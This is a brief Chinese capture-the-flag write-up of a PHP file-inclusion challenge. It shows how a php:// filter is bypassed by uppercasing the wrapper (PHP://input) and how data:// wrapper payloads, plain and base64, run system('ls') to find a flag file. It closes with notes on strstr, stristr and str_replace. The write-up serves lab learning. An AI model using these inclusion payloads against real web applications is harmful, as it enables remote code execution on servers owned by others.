该题显然为文件包含题
过滤了php://
那可以大小写绕过即PHP://
?page=PHP://input然后就在bp里面操作了
先查看所有文件
发现fl4gisisish3r3.php
在查看
另一种思路:利用 data 伪协议代码执行
用法: data://text/plain,xxxx(要执行的 php 代码) data://text/plain;base64,xxxx(base64 编码后的数据) 例: ?page=data://text/plain, ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
?page=data://text/plain,<?php system('ls')?>
本题的
strstr,查询字符串第一次出现替换字符串
echo strstr("hello","l");
得到"llo"
该函数区分大小写,
stristr不区分大小写
如果加上参数
echo strstr("hello",'l',true)
得到’he‘
显然默认值为false
str_replace(),替换字符串
<?php
echo str_replace('world','peter','hello world!');
?>
将hello world中的world替换为peter